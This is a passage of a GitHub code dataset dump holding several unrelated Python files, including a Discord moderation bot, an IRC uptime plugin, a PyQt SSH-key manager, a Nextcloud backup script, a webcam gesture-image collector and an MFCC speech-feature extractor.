process_fold_df(train_df)\n\n#scale to train on train set\n# scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n# scaler_transformer = scaler.fit(processed_train_df)\n# processed_train_df = scaler_transformer.transform(processed_train_df)\n\nprocessed_test_df = process_fold_df(test_df)\n# #scale to train on test set\n# processed_test_df = scaler_transformer.transform(processed_test_df)\n\n\n# COMMAND ----------\n\nprocessed_test_df1 = processed_test_df.withColumn(\"index\", monotonically_increasing_id()) \n\n# COMMAND ----------\n\ndisplay(processed_train_df)\n\n# COMMAND ----------\n\ndisplay(processed_test_df1)\n\n# COMMAND ----------\n\nprocessed_test_df.count()\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# processed_train_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_train\")\n# processed_test_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_test\")\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(f\"{blob_url}\"))\n\n# COMMAND ----------\n\n","repo_name":"cmunugala/flight-delay","sub_path":"Model_building/Process_data.py","file_name":"Process_data.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71774486568","text":"import csv\n\nwith open('stage3_test.csv', newline='') as csv_in, open(\"10000 int:\r\n \"\"\"\r\n Calcula e retorna o valor do delta.\r\n \"\"\"\r\n\r\n return (b**2) - (4*a*c)\r\n\r\n\r\ndef calculate_bhaskara(a: int, b: int, c: int) -> Tuple[float, float]:\r\n \"\"\"\r\n Calcula e retorna o resultado da formula de bhaskara. \r\n \"\"\"\r\n\r\n assert isinstance(a, int), \"o valor do coeficiente a nao eh inteiro\"\r\n assert a != 0, \"o valor do coeficiente a nao pode ser igual a 0\"\r\n assert isinstance(b, int), \"o valor do coeficiente b nao eh inteiro\"\r\n assert isinstance(c, int), \"o valor do coeficiente c nao eh inteiro\"\r\n\r\n\r\n delta = calculate_delta(a=a, b=b, c=c)\r\n\r\n if delta < 0:\r\n print(f\"A equacao nao possui raizes pertencentes ao conjunto dos numeros reais, pois delta = {round(delta, 2)} < 0\")\r\n return\r\n \r\n x1 = ((-b) + (sqrt(delta))) / (2*a)\r\n x2 = ((-b) - (sqrt(delta))) / (2*a)\r\n\r\n print(f\"As raizes da equacao {a}(x^2) {'+' if b > 0 else ''}{b}(x) {'+' if c > 0 else ''}{c} sao x1 = {round(x1, 2)} e x2 = {round(x2, 2)}\")\r\n\r\n return x1, x2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Modifique os valores de a, b e c a sua escolha.\r\n \"\"\"\r\n\r\n a = -1\r\n b = 6\r\n c = -9\r\n\r\n calculate_bhaskara(a=a, b=b, c=c)","repo_name":"eliasciceros/criando_apis_em_python","sub_path":"atividade_1/formula_de_Bhaskara.py","file_name":"formula_de_Bhaskara.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23932554674","text":"#=========================================================\n#\t\t\t\t\tBiblio\n#=========================================================\n\nimport discord # Импортируем библиотеку дискорд\nfrom discord.ext import commands \nfrom discord.utils import get\nfrom config import config # импортируем переменную конфиг\nimport json\nimport random\n\n#=========================================================\n#\t\t\t\t\tEvents\n#=========================================================\n\nclient = commands.Bot(command_prefix = config['prefix'])\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n\tprint('[LOG] Bot a online!') # Пишем в консоль о том что бот работает\n\n\tawait client.change_presence( status = discord.Status.online, activity = discord.Game('Discord')) # статус\n\n\n#=========================================================\n#\t\t\t\t\tCode\n#=========================================================\n#=========================================================\n#\t\t\t\t\tКоманда \"Kick\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def kick(ctx, member: discord.Member = None, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.kick( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Kick\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот кикнул пользователя {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Ban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def ban( ctx, member: discord.Member, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.ban( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Ban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот забанил игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Mute\"\n#p.s. создайте роль \"Mute\" для начала\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def mute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.add_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Mute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот дал мут игроку {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Unmute\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unmute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.remove_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unmute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот убрал мут с игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n#=========================================================\n#\t\t\t\t\tКоманда \"Unban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unban(ctx, *, member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tbanned_users = await ctx.guild.bans()\n\n\tfor banned_entry in banned_users:\n\t\tuser = banned_entry.user\n\n\t\tawait ctx.guild.unban(user)\n\t\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот разбанил игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n\t\treturn\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Clear\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True)\nasync def clear(ctx, amount=5):\n\tawait ctx.channel.purge(limit=amount)\n\n#=========================================================\n#\t\t\t\t\tКоманда \"changestatus\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True )\nasync def changestatus( ctx, statustype:str = None, *, arg:str = None):\n if statustype is None: # Type Check\n await ctx.send( 'Вы не указали тип Статуса' )\n elif arg is None: # Arg Check\n await ctx.send( 'Вы не указали нужный аргумент' )\n else:\n if statustype.lower() == 'game': # Game\n await Bot.change_presence (activity=discord.Game( name = arg) )\n elif statustype.lower() == 'listen': # Listen\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.listening, name = arg) )\n elif statustype.lower() == 'watch': # Watch\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.watching, name = arg) )\n#=========================================================\n#\t\t\t\t\tRun a bot\n#=========================================================\nclient.run(config['token'])\n","repo_name":"JoJoDevelopers/code.py","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73699160167","text":"import time\nimport sys\nimport os\nimport pyircbot\nfrom datetime import timedelta\n\nif len(sys.argv) < 2:\n print(\"Port!\")\n sys.exit(2)\n\nPORT=int(sys.argv[1])\n\ndef load_token(fname):\n path = os.path.expanduser(fname)\n with open(path, 'r') as f:\n token = f.readlines()[0].strip()\n\n return token\n\ndef onMessage(bot, message):\n if message.command != \"PRIVMSG\":\n return\n\n CMD = \"!osuptime\"\n if not message.params[1][:len(CMD)] == CMD:\n return\n\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_string = str(timedelta(seconds = uptime_seconds)) \n\n uptime_msg = \"{color} Host system uptime: {uptime}! {reset}\".format(\n color=chr(0x03) + '07,01',\n reset=chr(0x0F),\n uptime=uptime_string \n )\n\n resp = pyircbot.IRCMessage()\n resp.command = \"PRIVMSG\"\n resp.params = [pyircbot.response_destination(message), uptime_msg]\n bot.sendIrcMessage(resp)\n\nplugin = pyircbot.Plugin()\nplugin.name='leettime'\nplugin.token=load_token('~/ircbot_token')\nplugin.onMessage = onMessage\n\nbot = pyircbot.Bot('127.0.0.1', PORT, plugin)\nbot.start()\n\nsent = False\nwhile bot.isRunning():\n time.sleep(0.1)\n\nbot.wait()\n","repo_name":"kolodziej/ircbot","sub_path":"py-plugins/osuptime.py","file_name":"osuptime.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22215503466","text":"# 从摄像头出采集手势照片,用作训练集与测试集\n# 基于opencv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport sys, os, re\nimport cv2\n\n# 清空特定文件夹内的文件\ndef clear_dir(path='.\\dataset\\HAND POSE'):\n print(\"start trying to clean the path\")\n time.sleep(1)\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n if len(files) == 0:\n print(\"dir already cleaned\")\n time.sleep(2)\n else:\n for fi in files:\n os.remove(path + '\\\\' + fi)\n files = os.listdir(path)\n if len(files) == 0:\n print(\"successfully clean the dir\")\n time.sleep(2) \n\n# 控制摄像头捕获视频\n# 图片默认存放路径: .\\dataset\\HAND POSE\ndef control_camera(pic_number=10, path='.\\dataset\\HAND POSE'):\n n = 0 # 记录以拍摄的照片\n n1 = 0\n cap1 = cv2.VideoCapture(0) # 用于监控摄像头\n # 清空目标目录\n clear_dir(path)\n path = '.\\dataset\\HAND POSE' + '\\\\'\n print(\"start record picture\")\n\n while(True):\n # 当储存文件的数量达到所需的数量时,退出循环\n if n >= pic_number:\n print(\"reach the picture number\")\n print(\"ending the process\")\n time.sleep(1.5)\n break\n \n # 判断循环开始\n if n > n1:\n n1 = n\n print(\"Start record new picture\")\n\n # capture frame-by-frame\n ret, frame = cap1.read()\n # 绘制输入框\n cv2.rectangle(frame, (200, 120),(440, 360), (255, 0, 0),3) # 确定左上点, 右下点的宽,高以及线宽\n # Display the resulting frame\n cv2.imshow('capture', frame)\n \n # press q to quit the while loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print(\"exit\")\n time.sleep(1)\n break\n # when the number of photo larger than the setted value\n\n # 键入相应的键盘按键时,从摄像头中保存相应的图片\n if cv2.waitKey(1) & 0xFF == ord('a'):\n n += 1\n cv2.imwrite(path + str(n) + '-a.jpg', frame)\n print('saving image: ' + str(n) + '-a.jpg')\n print(\"n: \", n)\n print()\n continue\n \n if cv2.waitKey(1) & 0xFF == ord('s'):\n n += 1\n cv2.imwrite(path + str(n) + '-s.jpg', frame)\n print('saving image: ' + str(n) + '-s.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('d'):\n n += 1\n cv2.imwrite(path + str(n) + '-d.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('w'):\n n += 1\n cv2.imwrite(path + str(n) + '-w.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('o'):\n n += 1\n cv2.imwrite(path + str(n) + '-o.jpg', frame)\n print('saving image: ' + str(n) + '-o.jpg')\n print(\"n: \", n)\n print()\n continue \n \n cap1.release()\n cv2.destroyAllWindows()\n print(\"The final picture number: \", n)\n print(\" \")\n time.sleep(1)\n \n# 图片前处理, 同时读取出每张图片的标签并储存\n# 获取图像ROI,尺寸初设为240*240,在进行进一步缩小至120*120\n# 对图片重命名,同时将图片编号与label保存并导出到csv文件中\ndef pic_preprocess(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"start the picture preprocessing in \" + path)\n time.sleep(1)\n label = []\n column_name = ['label_id','pic_label']\n\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n print(\"treating \" + fi)\n # 分割文件文件名,并将其储存到label_id和label_set中\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n label.append([int(var.group(1)), var.group(2)])\n\n # 对图片进行尺寸处理\n current_file = path + '\\\\' + fi\n img = cv2.imread(current_file)\n if img.size >= 100000: # 确认图片是否在处理前或处理后\n print(\"Before treatment: \", img.shape, img.size, img.dtype) # 获取图像属性 \n img = img[120:360, 200:440] # 获取图像ROI\n img = cv2.resize(img, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_LINEAR) # 图像缩放,采用设置缩放因子的形式\n print(\"After treatment: \", img.shape, img.size, img.dtype)\n cv2.imwrite(current_file, img)\n\n # 单张照片处理结束\n print(\"finish treating \" + fi)\n print()\n else:\n # 跳过\n print(\"skip \" + fi)\n print()\n\n # break # 用于调试\n\n # 存入到labels中并导出为csv文件\n labels = pd.DataFrame(data=label, columns=column_name)\n labels = labels.sort_values(by = 'label_id', ascending=True)\n # print(labels)\n labels.to_csv(path + '\\\\' + 'labels.csv', encoding='gbk')\n return labels\n\n# 收集得到的图片进行重命名\ndef try_rename(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"rename all pic files\")\n time.sleep(0.5)\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n os.rename(path+ '\\\\' +fi, path+ '\\\\' +var.group(1) + '.jpg')\n\n\n# get_pic主程序\ndef pic_main(number=100):\n control_camera(pic_number=number)\n print(\"picture capture finish.\")\n print()\n time.sleep(0.5)\n pic_preprocess()\n print(\"picture preprocess finish.\")\n print()\n time.sleep(0.5)\n try_rename()\n print(\"picture rename finish.\")\n print()\n time.sleep(0.5)\n\nif __name__ == \"__main__\":\n n = 50\n # control_camera(pic_number=n)\n # pic_preprocess()\n # try_rename()\n pic_main(number=n)\n\n\n'''\n # opencv库基本摄像头操作\n cap = cv2.VideoCapture(0) # 创建摄像头对象\n print(type(cap))\n # 逐帧显示视频播放\n while(True):\n # 利用read()函数读取视频的某帧\n ret, frame = cap.read()\n # 展示\n cv2.imshow('capture', frame)\n # 若检测到键盘键入q,则退出\n if cv2.waitKey(1) & 0xFF == ord('q'):\n # 释放摄像头对象和窗口\n cap.release()\n cv2.destroyAllWindows()\n break\n'''","repo_name":"Alexnll/Hand-Pose-Estimation","sub_path":"get_pic.py","file_name":"get_pic.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"12850707045","text":"import geocoder\nimport folium\n\n# معرفة الاشخاص عن طريق الخريطة \n\n\n# هذا الكود عبارة متغير + عنوان الايبي الخاص بي \nour_ip = geocoder.ip(\"me\")\n\n#متغير يسمي الموقع ثم اعطيه الايبي \nlocation = our_ip.latlng\n\n# متغير الخريطة ثم اعطيه الموقع + حجم التكبير \nour_map = folium.Map(location=location, zoom_start=10)\n\n#هذا الكود يضع الموقع علي الخريطة \nfolium.Marker(location).add_to(our_map)\n\n# هذا الكود يضع بيانات الخريطة في صفحة بمتداد اتش تي ام ايل\nour_map.save(\"map.html\")\n\n#هنا نطبع الموقع \nprint(location)","repo_name":"waleed-nemer/python-socket","sub_path":"معرفة مكان اي شخص علي الخريطة/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"ar","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"39289985298","text":"from PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\nimport sys\n\nfrom PyQt5.QtWidgets import QTableWidgetItem\n\nfrom cloud_management import get_user_ssh, delete_ssh\n\nsshlist = {'Name': 'name', 'Public Key': 'public_key', 'Cloud': 'cloud_name', 'id': 'id', 'Cloud id': 'cloud_id'}\n\n\nclass ShowSSHUi(QtWidgets.QMainWindow):\n def __init__(self, user_id: int = None):\n super(ShowSSHUi, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('show_ssh.ui', self) # Load the .ui file\n self.user_id = user_id\n self.back = self.findChild(QtWidgets.QPushButton, 'bt_back')\n self.back.clicked.connect(self.backButtonPressed)\n\n self.edit = self.findChild(QtWidgets.QPushButton, 'edit')\n self.edit.clicked.connect(self.update_buttonPressed)\n\n self.create = self.findChild(QtWidgets.QPushButton, 'create')\n self.create.clicked.connect(self.createButtonPressed)\n\n self.delete = self.findChild(QtWidgets.QPushButton, 'delete_2')\n self.delete.clicked.connect(self.deleteButtonPressed)\n # todo maryam action titlesh pak nashode\n self.ssh_list = self.findChild(QtWidgets.QTableWidget, 'tableWidget')\n self.ssh_list.setColumnHidden(3, True) # column 3 is cloud id\n self.ssh_list.setColumnHidden(4, True) # column 4 is id\n self.create_table()\n\n def create_table(self):\n sshs = get_user_ssh(user_id=self.user_id)\n self.ssh_list.setRowCount(len(sshs))\n count = 0\n for ssh in sshs:\n for key, value in ssh.items():\n headercount = self.ssh_list.columnCount()\n m = key\n for x in range(0, headercount, 1):\n headertext = self.ssh_list.horizontalHeaderItem(x).text()\n if m == sshlist[headertext]:\n self.tableWidget.setItem(count, x, QTableWidgetItem(str(value)))\n count += 1\n\n def update_buttonPressed(self):\n row = self.ssh_list.currentItem().row()\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id,ssh_id=int(self.ssh_list.item(row, 4).text()))\n self.OtherWindow.show()\n self.close()\n\n def createButtonPressed(self):\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n def deleteButtonPressed(self):\n row = self.ssh_list.currentItem().row()\n delete_ssh(int(self.ssh_list.item(row, 4).text()))\n self.create_table()\n\n # todo if press back button back to dashboard\n def backButtonPressed(self):\n # if id=admin ->show all SSHs\n # from admin_dashboard import AdminDashboardUi\n # self.OtherWindow = AdminDashboardUi()\n # self.OtherWindow.show()\n # self.close()\n\n # if id=customer -> show just SSHs of customer\n from ui.dashboard import DashboardUi\n self.OtherWindow = DashboardUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n\n def get_value(object):\n if isinstance(object, QtWidgets.QComboBox):\n value = object.itemData(object.currentIndex())\n if isinstance(object, QtWidgets.QTextEdit):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QTextBrowser):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QLabel):\n value = object.text()\n if isinstance(object, QtWidgets.QSpinBox):\n value = object.value()\n if isinstance(object, QtWidgets.QDoubleSpinBox):\n value = object.value()\n return value\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv) # Create an instance of QtWidgets.QApplication\n window = ShowSSHUi(19) # Create an instance of our class\n window.show()\n sys.exit(app.exec_()) # Start the application\n\n\nif __name__ == \"__main__\":\n main()\n# todo maryam oon id ro hide kon actiono bardar\n# todo maryam safeyehaye manage ro pak kon kolan\n","repo_name":"vidagharavian/cloud_service","sub_path":"ui/show_ssh.py","file_name":"show_ssh.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33433532497","text":"from deployments import BasicRsyncBackup, client\nfrom deployments import user_config\nfrom os.path import dirname, abspath, join\nfrom datetime import datetime\nfrom sys import argv\n\n\nclass BackupNextcloud(BasicRsyncBackup):\n \"\"\"Backup the database and files for the nextcloud service.\"\"\"\n\n backup_dir = \"/backup/nextcloud\"\n source_dir = join(dirname(abspath(__file__)), \"mounts\", \"webroot\")\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize variables that are dynamic.\"\"\"\n super().__init__(*args, **kwargs)\n self.now = int(datetime.now().strftime(r\"%s\"))\n self.stage = join(self.backup_dir, \"staging\", str(self.now))\n self.container = client.containers.list(\n filters={'name': 'nextcloud_database_1'}\n )[0] # throws an exception if the container isn't running.\n\n def do_backup(self, *args, **kwargs):\n \"\"\"Override to add extra steps.\"\"\"\n self.prep_folder(self.backup_dir)\n self.prep_folder(self.stage)\n self.backup_database()\n super().do_backup(*args, **kwargs)\n\n def backup_database(self):\n \"\"\"Get a dump from the database and store it in the staging area.\"\"\"\n dump_result = self.container.exec_run(\n \"mysqldump -u nextcloud --password='%s' nextcloud\"\n % user_config['database']\n )\n if dump_result.exit_code:\n raise ValueError(\n \"The mysqldump command returned %d. The command output:\\n%s\"\n % (int(dump_result.exit_code), dump_result.output)\n )\n with open(join(self.stage, \"database.dump\"), 'w') as dumpfile:\n dumpfile.write(dump_result.output.decode())\n\n\ndef main():\n \"\"\"The main entrypoint of the backup script if it's run alone.\"\"\"\n if \"--no-cronjob\" in argv:\n # setup cron job\n freq = False\n else:\n if '--freq=hourly' in argv:\n freq = 'hourly'\n if '--freq=weekly' in argv:\n freq = 'weekly'\n if '--freq=monthly' in argv:\n freq = 'monthly'\n else:\n freq = 'daily'\n backup = BackupNextcloud(freq, abspath(__file__))\n backup.do_backup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dscottboggs/Deployments","sub_path":"deployments/nextcloud/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71471417768","text":"import numpy as np\r\nfrom scipy.fftpack import dct\r\nimport scipy.io.wavfile\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport hashlib\r\nimport re\r\nfrom hmmlearn import hmm\r\nimport pickle\r\nimport math\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import ConfusionMatrixDisplay\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\nfrom prettytable import PrettyTable\r\nfrom prettytable import PLAIN_COLUMNS\r\ndef get_features(file_path, pre_emphasis = 0.95, frame_size = 0.025, frame_step = 0.01, NFFT = 512,\\\r\n nfilt = 26, low_freq_hz = 300, num_ceps = 13): \r\n \"\"\"\r\n Args:\r\n file_path: File path of the data sample.\r\n pre_emphasis: filter coefficient for pre emphasis phase.\r\n frame_size: size of the frames in framing phase.\r\n frame_step: size of the overlap in framing phase.\r\n NFFT: point numbers of discrete Fourier Transform (DFT).\r\n nfilt: number of filters used in filter Banks calulation phase.\r\n low_freq_hz: lower frequency used in filter Banks calulation phase.\r\n num_ceps: number of Cepstral Coefficients. \r\n\r\n Returns:\r\n numpy array, of features: MFFCCs and delta coefficients.\r\n \"\"\"\r\n sample_rate, signal = scipy.io.wavfile.read(file_path)\r\n #sample_rate = 16000 \r\n \r\n #Preemphasis\r\n signal = np.append(signal[0], signal[1:] - pre_emphasis * signal[: -1])\r\n #plotSignal(time, signal)\r\n\r\n #Framing\r\n signal_length = len(signal)\r\n frame_length = int(frame_size * sample_rate)\r\n step_length = int(frame_step * sample_rate)\r\n\r\n\r\n num_frames = int(np.ceil(float(np.abs(signal_length-frame_length))/step_length))+1\r\n \r\n pad_signal_length = (frame_length + num_frames * step_length) - signal_length\r\n pad_signal = np.zeros(pad_signal_length)\r\n signal = np.append(signal,pad_signal)\r\n\r\n indices_matrix = np.tile(np.arange(0,frame_length),(num_frames,1))\r\n offset_indices = np.arange(0,step_length*num_frames,step_length)\r\n indices_matrix = (indices_matrix[0:].T + (offset_indices[0:])).T\r\n frames = signal[indices_matrix.astype(np.int32, copy=False)]\r\n\r\n #Windowing\r\n #Explicit implementation:\r\n #w = np.arange(0,frame_length)\r\n #w = 0.54 - 0.46 * np.cos((2 * np.pi * w) / (frame_length - 1))\r\n #frames*=w\r\n \r\n frames *= np.hamming(frame_length)\r\n \r\n \r\n #Discrete Fourier Transformation\r\n magnitude_frames = np.absolute(np.fft.rfft(frames, NFFT))\r\n \r\n #Power spectrum\r\n pow_frames = (magnitude_frames ** 2) / NFFT\r\n \r\n #Compute energy\r\n energy = np.sum(pow_frames, axis = 1)\r\n\r\n #Filter Banks\r\n # nfilt = filters number\r\n # low_freq_hz = 300 usually default is 0 (set to 300 for discard too low frequency,\\\r\n # likely generated from noise)\r\n highfreq = sample_rate / 2\r\n low_freq_mel = (2595 * np.log10(1 + low_freq_hz / 700.)) # Convert Hz to Mel\r\n high_freq_mel = (2595 * np.log10(1 + highfreq / 700.)) # Convert Hz to Mel\r\n\r\n mel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2 ) # Equally spaced in Mel scale\r\n hz_points = (700 * (10** (mel_points / 2595.0) - 1 )) # Convert Mel to Hz\r\n \r\n #hz_points 28 gia tri : 300 -> 8000\r\n bin = np.floor((NFFT + 1) * hz_points / sample_rate) # our points are in Hz, but we use fft bins,\\\r\n # so we have to conver from Hz to fft bin number\r\n # print(bin)\r\n # [ 9. 12. 15. 18. 21. 25. 29. 33. 38. 43. 49. 54. 61. 68.\r\n #75. 84. 93. 102. 113. 124. 136. 150. 164. 180. 196. 215. 235. 256.]\r\n fbank = np.zeros((nfilt, int(np.floor(NFFT / 2 + 1))))\r\n #fbank.size=6682\r\n \r\n for j in range(0,nfilt):\r\n for i in range(int(bin[j]), int(bin[j+1])):\r\n fbank[j,i] = (i - bin[j]) / (bin[j+1]-bin[j])\r\n for i in range(int(bin[j+1]), int(bin[j+2])):\r\n fbank[j,i] = (bin[j+2]-i) / (bin[j+2]-bin[j+1])\r\n \r\n # Plot filterbank if you want \r\n #plotFilterbank(fbank) \r\n # print(pow_frames[0].size)\r\n filter_banks = np.dot(pow_frames, fbank.T)\r\n \r\n filter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # if energy is zero, we get problems with log\r\n \r\n filter_banks = np.log10(filter_banks) # dB\r\n \r\n #Mel Frequency Cepstral Coefficients\r\n mfcc = dct(filter_banks, type=2, axis=1, norm='ortho')[:, 0:(num_ceps)] # Keep 0 to num_ceps-1\r\n \r\n mfcc[:, 0] = np.log(energy + 1e-8) # the zeroth cepstral coefficient is replaced with the log of\\\r\n # the total frame energy\r\n\r\n\r\n cep_lifter = 22\r\n (nframes, ncoeff) = mfcc.shape\r\n n = np.arange(ncoeff)\r\n lift = 1 + (cep_lifter / 2) * np.sin(np.pi * n / cep_lifter)\r\n mfcc *= lift \r\n\r\n #Mean normalization \r\n filter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)\r\n mfcc -= (np.mean(mfcc, axis=0) + 1e-8)\r\n\r\n #Delta compute\r\n N = 2\r\n num_frames = mfcc.shape[0]\r\n \r\n denominator = 2 * sum([n**2 for n in range(1, N+1)])\r\n \r\n delta_feat = np.empty_like(mfcc)\r\n delta_feat2 = np.empty_like(mfcc)\r\n padded = np.pad(mfcc, ((N, N), (0, 0)), mode='edge') # padded version of feature vectors(mfcc) (appending N*2 rows)\r\n # print(mfcc[1])\r\n # print(padded[1])\r\n for t in range(num_frames):\r\n delta_feat[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]\r\n # print(np.arange(-N, N+1)[0 : 5])\r\n #Append mfcc and Delta features\r\n features = np.append(mfcc, delta_feat, axis = 1)\r\n padded = np.pad(delta_feat, ((N, N), (0, 0)), mode='edge')\r\n for t in range(num_frames):\r\n delta_feat2[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator\r\n features = np.append(features, delta_feat2, axis = 1) \r\n # print(features.size)\r\n return features\r\ndef main() :\r\n train_dict_word = {}\r\n test_dict_word = {}\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/features/data_train\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for txt in file:\r\n if(re.match('.*\\.txt$',txt)):\r\n file_path = (os.path.join(root_dir, txt))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = np.loadtxt(\"Dataset/features/data_train/\"+label+\"/\"+txt,delimiter=', ')\r\n labels_list.append(label)\r\n features_list.append(feature)\r\n \r\n words = np.unique(labels_list)\r\n \"\"\"\r\n Split 85% for training and 15% for test\r\n \"\"\"\r\n training_features = features_list\r\n training_labels = labels_list\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/data/data_set\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for wave in file:\r\n \r\n if(re.match('.*\\.wav$',wave)):\r\n 